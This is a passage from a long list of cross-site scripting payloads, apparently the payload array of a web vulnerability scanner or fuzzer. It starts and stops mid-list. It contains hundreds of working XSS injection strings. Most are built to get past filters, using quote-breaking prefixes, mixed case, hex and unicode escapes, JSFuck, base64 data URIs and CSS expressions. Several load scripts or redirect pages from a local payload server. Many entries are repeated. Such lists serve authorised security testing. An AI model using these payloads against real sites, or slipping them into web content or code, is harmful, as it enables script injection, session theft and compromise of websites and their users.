name=self location="javascript&#58;alert(1)"></form><script>if(top!=self){top.location=self.location}</script>', '%3Cimg%20name%3DgetElementsByTagName%20src%3D1%20%20onerror%3Dalert(1)%3E', '%3Cform%20onmouseover%3Dalert(1)%3E%3Cinput%20name%3Dattributes%3E', "<a/onmouseover[\\x0b]=location='\\x6A\\x61\\x76\\x61\\x73\\x63\\x72\\x69\\x70\\x74\\x3A\\x61\\x6C\\x65\\x72\\x74\\x28\\x31\\x29\\x3B'>X", 
'"><a/onmouseover[\\x0b]=location=\'\\x6A\\x61\\x76\\x61\\x73\\x63\\x72\\x69\\x70\\x74\\x3A\\x61\\x6C\\x65\\x72\\x74\\x28\\x31\\x29\\x3B\'>X', "'><a/onmouseover[\\x0b]=location='\\x6A\\x61\\x76\\x61\\x73\\x63\\x72\\x69\\x70\\x74\\x3A\\x61\\x6C\\x65\\x72\\x74\\x28\\x31\\x29\\x3B'>X", 'data:text/html,%3Cscript%3Ealert(1)%3C%2Fscript%3E', 'window.name//\'name="javascript:alert("X")', '<svg/onload=location=/java/.source+/script/.source+location.h ash[1]+/al/.source+/ert/.source+location.hash[2]+/docu/.source+/ment.domain/.source+location.has h[3]//#:()', '"><svg/onload=location=/java/.source+/script/.source+location.h ash[1]+/al/.source+/ert/.source+location.hash[2]+/docu/.source+/ment.domain/.source+location.has h[3]//#:()', "'><svg/onload=location=/java/.source+/script/.source+location.h ash[1]+/al/.source+/ert/.source+location.hash[2]+/docu/.source+/ment.domain/.source+location.has h[3]//#:()", '<%div%20style=xss:expression(prompt(1))>', '"><%div%20style=xss:expression(prompt(1))>', "'><%div%20style=xss:expression(prompt(1))>", '%22]);}catch(e){}if(!self.a)self.a=!alert(1);/', '<script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script>;', '</ScrIpt><script>alert(1)</script>;', '"><script>alert(1)</script>;', '</ScrIpt><script>alert(1)</script>;', "'><script>alert(1)</script>;", '</ScrIpt><script>alert(1)</script>;', '<script>alert("/X"/)</script>', '</ScrIpt><script>alert("/X"/)</script>', '"><script>alert("/X"/)</script>', '</ScrIpt><script>alert("/X"/)</script>', '\'><script>alert("/X"/)</script>', '</ScrIpt><script>alert("/X"/)</script>', '<SCRIPT>a=/X/', '</ScrIpt><SCRIPT>a=/X/', '"><SCRIPT>a=/X/', '</ScrIpt><SCRIPT>a=/X/', "'><SCRIPT>a=/X/", '</ScrIpt><SCRIPT>a=/X/\\nalert(1);</SCRIPT>', '</ScrIpt><SCRIPT>a=/X/', '</ScrIpt><SCRIPT>a=/X/', '"><SCRIPT>a=/X/', '</ScrIpt><SCRIPT>a=/X/', "'><SCRIPT>a=/X/", 
'</ScrIpt><SCRIPT>a=/X/\\nalert(1);</SCRIPT>', '"><SCRIPT>a=/X/', '</ScrIpt><SCRIPT>a=/X/', '"><SCRIPT>a=/X/', '</ScrIpt><SCRIPT>a=/X/', "'><SCRIPT>a=/X/", '</ScrIpt><SCRIPT>a=/X/\\nalert(1);</SCRIPT>', '</ScrIpt><SCRIPT>a=/X/', '</ScrIpt><SCRIPT>a=/X/', '"><SCRIPT>a=/X/', '</ScrIpt><SCRIPT>a=/X/', "'><SCRIPT>a=/X/", '</ScrIpt><SCRIPT>a=/X/\\nalert(1);</SCRIPT>', "'><SCRIPT>a=/X/", '</ScrIpt><SCRIPT>a=/X/', '"><SCRIPT>a=/X/', '</ScrIpt><SCRIPT>a=/X/', "'><SCRIPT>a=/X/", '</ScrIpt><SCRIPT>a=/X/\\nalert(1);</SCRIPT>', '</ScrIpt><SCRIPT>a=/X/', '</ScrIpt><SCRIPT>a=/X/', '"><SCRIPT>a=/X/', '</ScrIpt><SCRIPT>a=/X/', "'><SCRIPT>a=/X/", '</ScrIpt><SCRIPT>a=/X/\\nalert(1);</SCRIPT>', '<script>alert([!![]]+[])</script>', '</ScrIpt><script>alert([!![]]+[])</script>', '"><script>alert([!![]]+[])</script>', '</ScrIpt><script>alert([!![]]+[])</script>', "'><script>alert([!![]]+[])</script>", '</ScrIpt><script>alert([!![]]+[])</script>', '<script>prompt(-[])</script>', '</ScrIpt><script>prompt(-[])</script>', '"><script>prompt(-[])</script>', '</ScrIpt><script>prompt(-[])</script>', "'><script>prompt(-[])</script>", '</ScrIpt><script>prompt(-[])</script>', '<scr/**/ipt>alert(1)</sc/**/ipt>', '"><scr/**/ipt>alert(1)</sc/**/ipt>', "'><scr/**/ipt>alert(1)</sc/**/ipt>", '#<script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script>', "\\'><script>X<\\/script>", "\\'><body onload=\\'X\\'>", '><script>X<\\/script>', '<body onload="X">', '"><body onload="X">', '\'><body onload="X">', '<img src="x:X" onerror="alert(1)">', '"><img src="x:X" onerror="alert(1)">', '\'><img src="x:X" onerror="alert(1)">', '<img src=a onerror=alert(1)', '"><img src=a onerror=alert(1)', "'><img src=a onerror=alert(1)%0A>a", '"><img src=a onerror=alert(1)%0A>a', "'><img src=a onerror=alert(1)%0A>a", 'onmouseover=alert(1);', '<<SCRIPT>alert(1);/', '"><<SCRIPT>alert(1);/', 
"'><<SCRIPT>alert(1);/", '<SCRIPT>a=/X/', '</ScrIpt><SCRIPT>a=/X/', '"><SCRIPT>a=/X/', '</ScrIpt><SCRIPT>a=/X/', "'><SCRIPT>a=/X/", '</ScrIpt><SCRIPT>a=/X/', 'alert(1)', 'alert(String.fromCharCode(49))', 'alert(/1/.source)', "eval('alert(1)')", "this['EvAL'.toLowerCase()]('aLErT(1)'.toLowerCase())", '(alert(1)).replace(/.+/,eval);', '\\u0061\\u006c\\u0065\\u0072\\u0074(1)', "eval('\\u00' + '6' + '1'+'le' + '\\u0072' + 't(1)')", "eval('\\141\\154\\145\\162\\164\\50\\61\\51')", "eval('\\x61\\x6c\\x65\\x72\\x74(1)')", "eval('\\x61ler\\x74(1)')", "top['a\\x6Cert'](1)", "x='\\x61\\x6c\\x65\\x72\\x74\\x28\\x31\\x29';new Function(x)()", "setTimeout('alert(1)',0)", 'setTimeout(\\u0061\\u006c\\u0065\\u0072\\u0074(1),0);', "onerror=eval;throw'alert\\x281\\x29';", 'expression(URL=0)', 'expr\\65 ssion(URL=0)', 'expr\\65 ss/*???*/ion(URL=0);', 'expression\\28URL=0\\29', 'expr\\65 ss/*\\%/ion\\28URL=0\\29', '\\000045xpr\\000065 ss/*BlABl/\\\\aaaaa!!!*', 'feed:javascript:alert(1)', 'feed:javascript:alert(1)', 'feed:data:text/html,%3cscript%3ealert%281%29%3c/script%3e', 'feed:data:text/html,%3csvg%20onload=alert%281%29%3e', 'data:text/html,%3Cscript%3Ealert(1)%3C/script%3E', 'data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==', 'data:_;;;:;base64_______,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==', '<LAYER SRC="javascript:alert(1);"></LAYER>', '"><LAYER SRC="javascript:alert(1);"></LAYER>', '\'><LAYER SRC="javascript:alert(1);"></LAYER>', '<LINK REL="stylesheet" HREF="javascript:alert(1);">', '"><LINK REL="stylesheet" HREF="javascript:alert(1);">', '\'><LINK REL="stylesheet" HREF="javascript:alert(1);">', '<!--[if gte IE 4]><SCRIPT>alert(1);</SCRIPT>', '</ScrIpt><SCRIPT>alert(1);</SCRIPT>', '"><SCRIPT>alert(1);</SCRIPT>', '</ScrIpt><SCRIPT>alert(1);</SCRIPT>', "'><SCRIPT>alert(1);</SCRIPT>", '</ScrIpt><SCRIPT>alert(1);</SCRIPT><![endif]-->', '"><!--[if gte IE 4]><SCRIPT>alert(1);</SCRIPT>', '</ScrIpt><SCRIPT>alert(1);</SCRIPT>', '"><SCRIPT>alert(1);</SCRIPT>', 
'</ScrIpt><SCRIPT>alert(1);</SCRIPT>', "'><SCRIPT>alert(1);</SCRIPT>", '</ScrIpt><SCRIPT>alert(1);</SCRIPT><![endif]-->', "'><!--[if gte IE 4]><SCRIPT>alert(1);</SCRIPT>", '</ScrIpt><SCRIPT>alert(1);</SCRIPT>', '"><SCRIPT>alert(1);</SCRIPT>', '</ScrIpt><SCRIPT>alert(1);</SCRIPT>', "'><SCRIPT>alert(1);</SCRIPT>", '</ScrIpt><SCRIPT>alert(1);</SCRIPT><![endif]-->', '<BASE HREF="javascript:alert(1);//">', '"><BASE HREF="javascript:alert(1);//">', '\'><BASE HREF="javascript:alert(1);//">', 'data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==', '<script>alert(String.fromCharCode(75,67,70))</script>', '</ScrIpt><script>alert(String.fromCharCode(75,67,70))</script>', '"><script>alert(String.fromCharCode(75,67,70))</script>', '</ScrIpt><script>alert(String.fromCharCode(75,67,70))</script>', "'><script>alert(String.fromCharCode(75,67,70))</script>", '</ScrIpt><script>alert(String.fromCharCode(75,67,70))</script>', '<IFRAME SRC="javascript:alert(1);"></IFRAME>', '"><IFRAME SRC="javascript:alert(1);"></IFRAME>', '\'><IFRAME SRC="javascript:alert(1);"></IFRAME>', '<iframe src="javascript:alert(1); <', '"><iframe src="javascript:alert(1); <', '\'><iframe src="javascript:alert(1); <', '<object data="data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg=="></object>', '"><object data="data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg=="></object>', '\'><object data="data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg=="></object>', '<SCRIPT>x=/X/ alert(x.source)</SCRIPT>', '</ScrIpt><SCRIPT>x=/X/ alert(x.source)</SCRIPT>', '"><SCRIPT>x=/X/ alert(x.source)</SCRIPT>', '</ScrIpt><SCRIPT>x=/X/ alert(x.source)</SCRIPT>', "'><SCRIPT>x=/X/ alert(x.source)</SCRIPT>", '</ScrIpt><SCRIPT>x=/X/ alert(x.source)</SCRIPT>', '<BODY ONLOAD=alert(1)>', '"><BODY ONLOAD=alert(1)>', "'><BODY ONLOAD=alert(1)>", '<ScRiPt+>prompt(1)</ScRiPt>', '"><ScRiPt+>prompt(1)</ScRiPt>', "'><ScRiPt+>prompt(1)</ScRiPt>", '<img src=X onerror=alert(1)>', '"><img src=X 
onerror=alert(1)>', "'><img src=X onerror=alert(1)>", '<img src=/ onerror=alert(1);>', '"><img src=/ onerror=alert(1);>', "'><img src=/ onerror=alert(1);>", '<BODY BACKGROUND="javascript:alert(1)">', '"><BODY BACKGROUND="javascript:alert(1)">', '\'><BODY BACKGROUND="javascript:alert(1)">', '<TABLE BACKGROUND="javascript:alert(1)">', '"><TABLE BACKGROUND="javascript:alert(1)">', '\'><TABLE BACKGROUND="javascript:alert(1)">', "<IMG SRC='vbscript:msgbox(1)'>", '"><IMG SRC=\'vbscript:msgbox(1)\'>', "'><IMG SRC='vbscript:msgbox(1)'>", '<ScriPt>ALeRt(? X ?)</scriPt>', '</ScrIpt><ScriPt>ALeRt(? X ?)</scriPt>', '"><ScriPt>ALeRt(? X ?)</scriPt>', '</ScrIpt><ScriPt>ALeRt(? X ?)</scriPt>', "'><ScriPt>ALeRt(? X ?)</scriPt>", '</ScrIpt><ScriPt>ALeRt(? X ?)</scriPt>', '<a href="javascript#alert(1);">', '"><a href="javascript#alert(1);">', '\'><a href="javascript#alert(1);">', '<div onmouseover="alert(1);">', '"><div onmouseover="alert(1);">', '\'><div onmouseover="alert(1);">', '<BR SIZE="&{alert(1)}">', '"><BR SIZE="&{alert(1)}">', '\'><BR SIZE="&{alert(1)}">', '&<script>alert(1);</script>', '</ScrIpt><script>alert(1);</script>', '"><script>alert(1);</script>', '</ScrIpt><script>alert(1);</script>', "'><script>alert(1);</script>", '</ScrIpt><script>alert(1);</script>', '&{alert(1);};', '<img src=&{alert(1);};>', '"><img src=&{alert(1);};>', "'><img src=&{alert(1);};>", '<img src="mocha:alert(1);">', '"><img src="mocha:alert(1);">', '\'><img src="mocha:alert(1);">', '<img src="livescript:alert(1);">', '"><img src="livescript:alert(1);">', '\'><img src="livescript:alert(1);">', '<a href="about:<script>alert(1);</script>', '</ScrIpt><script>alert(1);</script>', '"><script>alert(1);</script>', '</ScrIpt><script>alert(1);</script>', "'><script>alert(1);</script>", '</ScrIpt><script>alert(1);</script>">', '[\\xC0][\\xBC]script>alert(1);[\\xC0][\\xBC]/script>" };', '<object classid="clsid:..." codebase="javascript:alert(1);">', '"><object classid="clsid:..." 
codebase="javascript:alert(1);">', '\'><object classid="clsid:..." codebase="javascript:alert(1);">', '<style><!--</style><script>alert(1);//--></script>', '"><style><!--</style><script>alert(1);//--></script>', "'><style><!--</style><script>alert(1);//--></script>", '<![CDATA[<!--]]<script>alert(1);//--></script>', '"><![CDATA[<!--]]<script>alert(1);//--></script>', "'><![CDATA[<!--]]<script>alert(1);//--></script>", '<!-- -- --><script>alert(1);</script>', '</ScrIpt><script>alert(1);</script>', '"><script>alert(1);</script>', '</ScrIpt><script>alert(1);</script>', "'><script>alert(1);</script>", '</ScrIpt><script>alert(1);</script><!-- -- -->', 'javascript:/*-->]]>%>?></script></title></textarea></noscript></style></xmp>">[img=1,name=/alert(1)/.source]<img -/style=a:expression(/*\'/-/*',/**/eval(name)/*%2A///*///);width:100%;height:100%;position:absolute;-ms-behavior:url(#default#time2) name=alert(1) onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=eval(name) onmouseover=eval(name) onbegin=eval(name) background=javascript:eval(name)//>"', '<EMBED SRC="http://127.0.0.1:3555/xss_serve_payloads/flash.swf"></EMBED>', '"><EMBED SRC="http://127.0.0.1:3555/xss_serve_payloads/flash.swf"></EMBED>', '\'><EMBED SRC="http://127.0.0.1:3555/xss_serve_payloads/flash.swf"></EMBED>', '<img src="http://127.0.0.1:3555/xss_serve_payloads/image.png" onerror=alert(1)>', '"><img src="http://127.0.0.1:3555/xss_serve_payloads/image.png" onerror=alert(1)>', '\'><img src="http://127.0.0.1:3555/xss_serve_payloads/image.png" onerror=alert(1)>', '<img src="http://127.0.0.1:3555/xss_serve_payloads/gif.gif" onerror=alert(1)>', '"><img src="http://127.0.0.1:3555/xss_serve_payloads/gif.gif" onerror=alert(1)>', '\'><img src="http://127.0.0.1:3555/xss_serve_payloads/gif.gif" onerror=alert(1)>', '<img src="http://127.0.0.1:3555/xss_serve_payloads/bmp.bmp" onerror=alert(1)>', '"><img src="http://127.0.0.1:3555/xss_serve_payloads/bmp.bmp" onerror=alert(1)>', '\'><img 
src="http://127.0.0.1:3555/xss_serve_payloads/bmp.bmp" onerror=alert(1)>', '<img src="http://127.0.0.1:3555/xss_serve_payloads/jpg.jpg" onerror=alert(1)>', '"><img src="http://127.0.0.1:3555/xss_serve_payloads/jpg.jpg" onerror=alert(1)>', '\'><img src="http://127.0.0.1:3555/xss_serve_payloads/jpg.jpg" onerror=alert(1)>', '<meta HTTP-EQUIV="REFRESH" content="0; url=http://127.0.0.1:3555/xss_serve_payloads/X.html">', '"><meta HTTP-EQUIV="REFRESH" content="0; url=http://127.0.0.1:3555/xss_serve_payloads/X.html">', '\'><meta HTTP-EQUIV="REFRESH" content="0; url=http://127.0.0.1:3555/xss_serve_payloads/X.html">', '<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html; base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">', '"><META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html; base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">', '\'><META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html; base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">', '<META HTTP-EQUIV="refresh" CONTENT="0;url=data:image/svg+xml; base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">', '"><META HTTP-EQUIV="refresh" CONTENT="0;url=data:image/svg+xml; base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">', '\'><META HTTP-EQUIV="refresh" CONTENT="0;url=data:image/svg+xml; base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">', '<BGSOUND SRC="javascript:alert(1);">', '"><BGSOUND SRC="javascript:alert(1);">', '\'><BGSOUND SRC="javascript:alert(1);">', '<script type="text/javascript">window.open("http://127.0.0.1:3555/xss_serve_payloads/X.html","_self");</script>', '"><script type="text/javascript">window.open("http://127.0.0.1:3555/xss_serve_payloads/X.html","_self");</script>', '\'><script type="text/javascript">window.open("http://127.0.0.1:3555/xss_serve_payloads/X.html","_self");</script>', '<SCRIPT =">" SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>', '"><SCRIPT =">" SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>', '\'><SCRIPT =">" 
SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>', '<SCRIPT a=">" SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>', '"><SCRIPT a=">" SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>', '\'><SCRIPT a=">" SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>', '<SCRIPT a=">" \'\' SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>', '"><SCRIPT a=">" \'\' SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>', '\'><SCRIPT a=">" \'\' SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>', '<SCRIPT "a=\'>\'" SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>', '"><SCRIPT "a=\'>\'" SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>', '\'><SCRIPT "a=\'>\'" SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>', '<SCRIPT a=`>` SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>', '"><SCRIPT a=`>` SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>', '\'><SCRIPT a=`>` SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>', '<SCRIPT a=">\'>" SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>', '"><SCRIPT a=">\'>" SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>', '\'><SCRIPT a=">\'>" SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>', '<SCRIPT =">" SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>', '"><SCRIPT =">" SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>', '\'><SCRIPT =">" SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>', '<SCRIPT a=">" SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>', '"><SCRIPT a=">" SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>', '\'><SCRIPT a=">" SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>', '<SCRIPT a=">" \'\' SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>', '"><SCRIPT a=">" \'\' SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>', 
'\'><SCRIPT a=">" \'\' SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>', '<SCRIPT "a=\'>\'" SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>', '"><SCRIPT "a=\'>\'" SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>', '\'><SCRIPT "a=\'>\'" SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>', '<SCRIPT a=`>` SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>', '"><SCRIPT a=`>` SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>', '\'><SCRIPT a=`>` SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>', '<SCRIPT a=">\'>" SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>', '"><SCRIPT a=">\'>" SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>', '\'><SCRIPT a=">\'>" SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>', '<TABLE><TD BACKGROUND="javascript:alert(1)">', '"><TABLE><TD BACKGROUND="javascript:alert(1)">', '\'><TABLE><TD BACKGROUND="javascript:alert(1)">', '<img src=\'http://127.0.0.1:3555/xss_serve_payloads/gif.gif\' onload=\'document.scripts(0).src="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"\'>', '"><img src=\'http://127.0.0.1:3555/xss_serve_payloads/gif.gif\' onload=\'document.scripts(0).src="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"\'>', '\'><img src=\'http://127.0.0.1:3555/xss_serve_payloads/gif.gif\' onload=\'document.scripts(0).src="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"\'>', '<img src=\'http://127.0.0.1:3555/xss_serve_payloads/gif.gif\' onload=\'document.scripts(0).src="http://127.0.0.1:3555/xss_serve_payloads/X.js"\'>', '"><img src=\'http://127.0.0.1:3555/xss_serve_payloads/gif.gif\' onload=\'document.scripts(0).src="http://127.0.0.1:3555/xss_serve_payloads/X.js"\'>', '\'><img src=\'http://127.0.0.1:3555/xss_serve_payloads/gif.gif\' onload=\'document.scripts(0).src="http://127.0.0.1:3555/xss_serve_payloads/X.js"\'>', '<img 
src=\'http://127.0.0.1:3555/xss_serve_payloads/xxxgif.gif\' onerror=\'document.scripts(0).src="http://127.0.0.1:3555/xss_serve_payloads/X.js"\'>', '"><img src=\'http://127.0.0.1:3555/xss_serve_payloads/xxxgif.gif\' onerror=\'document.scripts(0).src="http://127.0.0.1:3555/xss_serve_payloads/X.js"\'>', '\'><img src=\'http://127.0.0.1:3555/xss_serve_payloads/xxxgif.gif\' onerror=\'document.scripts(0).src="http://127.0.0.1:3555/xss_serve_payloads/X.js"\'>', '<img src=\'http://127.0.0.1:3555/xss_serve_payloads/xxxgif.gif\' onerror=\'document.scripts(0).src="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"\'>', '"><img src=\'http://127.0.0.1:3555/xss_serve_payloads/xxxgif.gif\' onerror=\'document.scripts(0).src="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"\'>', '\'><img src=\'http://127.0.0.1:3555/xss_serve_payloads/xxxgif.gif\' onerror=\'document.scripts(0).src="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"\'>', "<img src='http://127.0.0.1:3555/xss_serve_payloads/X.html' onload=alert(1)//></img>", '"><img src=\'http://127.0.0.1:3555/xss_serve_payloads/X.html\' onload=alert(1)//></img>', "'><img src='http://127.0.0.1:3555/xss_serve_payloads/X.html' onload=alert(1)//></img>", '<script>alert((+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]])</script>', '</ScrIpt><script>alert((+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]])</script>', '"><script>alert((+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]])</script>', '</ScrIpt><script>alert((+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]])</script>', 
"'><script>alert((+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]])</script>", '</ScrIpt><script>alert((+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]])</script>', '<img src=javasc ript:ale rt('XSS')>', '"><img src=javasc ript:ale rt('XSS')>', "'><img src=javasc ript:ale rt('XSS')>", '<IMG SRC=javascri pt:alert(' XSS')>', '"><IMG SRC=javascri pt:alert(' XSS')>', "'><IMG SRC=javascri pt:alert(' XSS')>", '<img src=java scrip t:ale rt('X SS')>', '"><img src=java scrip t:ale rt('X SS')>', "'><img src=java scrip t:ale rt('X SS')>", '?><script>prompt(1)</script>', '</ScrIpt><script>prompt(1)</script>', '"><script>prompt(1)</script>', '</ScrIpt><script>prompt(1)</script>', "'><script>prompt(1)</script>", '</ScrIpt><script>prompt(1)</script>', '?><script>alert(String.fromCharCode(75,67,70))</script>', '</ScrIpt><script>alert(String.fromCharCode(75,67,70))</script>', '"><script>alert(String.fromCharCode(75,67,70))</script>', '</ScrIpt><script>alert(String.fromCharCode(75,67,70))</script>', "'><script>alert(String.fromCharCode(75,67,70))</script>", '</ScrIpt><script>alert(String.fromCharCode(75,67,70))</script>', '?><script>prompt(1)</script>', '</ScrIpt><script>prompt(1)</script>', '"><script>prompt(1)</script>', '</ScrIpt><script>prompt(1)</script>', "'><script>prompt(1)</script>", '</ScrIpt><script>prompt(1)</script>', '?><script>alert(String.fromCharCode(75,67,70))</script>', '</ScrIpt><script>alert(String.fromCharCode(75,67,70))</script>', '"><script>alert(String.fromCharCode(75,67,70))</script>', '</ScrIpt><script>alert(String.fromCharCode(75,67,70))</script>', "'><script>alert(String.fromCharCode(75,67,70))</script>", '</ScrIpt><script>alert(String.fromCharCode(75,67,70))</script>', '<ScRIPt>prompt(1)</ScRIPt>', '</ScrIpt><ScRIPt>prompt(1)</ScRIPt>', 
'"><ScRIPt>prompt(1)</ScRIPt>', '</ScrIpt><ScRIPt>prompt(1)</ScRIPt>', "'><ScRIPt>prompt(1)</ScRIPt>", '</ScrIpt><ScRIPt>prompt(1)</ScRIPt>', '<ScRIPt<aLeRT(String.fromCharCode(75,67,70))</ScRIPt>', '"><ScRIPt<aLeRT(String.fromCharCode(75,67,70))</ScRIPt>', "'><ScRIPt<aLeRT(String.fromCharCode(75,67,70))</ScRIPt>", '?><ScRIPt>prompt(1)</ScRIPt>', '</ScrIpt><ScRIPt>prompt(1)</ScRIPt>', '"><ScRIPt>prompt(1)</ScRIPt>', '</ScrIpt><ScRIPt>prompt(1)</ScRIPt>', "'><ScRIPt>prompt(1)</ScRIPt>", '</ScrIpt><ScRIPt>prompt(1)</ScRIPt>', '?><ScRIPt<aLeRT(String.fromCharCode(75,67,70))</ScRIPt>', '"><ScRIPt<aLeRT(String.fromCharCode(75,67,70))</ScRIPt>', "'><ScRIPt<aLeRT(String.fromCharCode(75,67,70))</ScRIPt>", '?><ScRIPt>prompt(1)</ScRIPt>', '</ScrIpt><ScRIPt>prompt(1)</ScRIPt>', '"><ScRIPt>prompt(1)</ScRIPt>', '</ScrIpt><ScRIPt>prompt(1)</ScRIPt>', "'><ScRIPt>prompt(1)</ScRIPt>", '</ScrIpt><ScRIPt>prompt(1)</ScRIPt>', '?><ScRIPt<aLeRT(String.fromCharCode(75,67,70))</ScRIPt>', '"><ScRIPt<aLeRT(String.fromCharCode(75,67,70))</ScRIPt>', "'><ScRIPt<aLeRT(String.fromCharCode(75,67,70))</ScRIPt>", '</script><script>prompt(1)</script>', '</ScrIpt><script>prompt(1)</script>', '"><script>prompt(1)</script>', '</ScrIpt><script>prompt(1)</script>', "'><script>prompt(1)</script>", '</ScrIpt><script>prompt(1)</script>', '"></script><script>prompt(1)</script>', '</ScrIpt><script>prompt(1)</script>', '"><script>prompt(1)</script>', '</ScrIpt><script>prompt(1)</script>', "'><script>prompt(1)</script>", '</ScrIpt><script>prompt(1)</script>', "'></script><script>prompt(1)</script>", '</ScrIpt><script>prompt(1)</script>', '"><script>prompt(1)</script>', '</ScrIpt><script>prompt(1)</script>', "'><script>prompt(1)</script>", '</ScrIpt><script>prompt(1)</script>', '</script><script>alert(String.fromCharCode(75,67,70))</script>', '"></script><script>alert(String.fromCharCode(75,67,70))</script>', "'></script><script>alert(String.fromCharCode(75,67,70))</script>", 
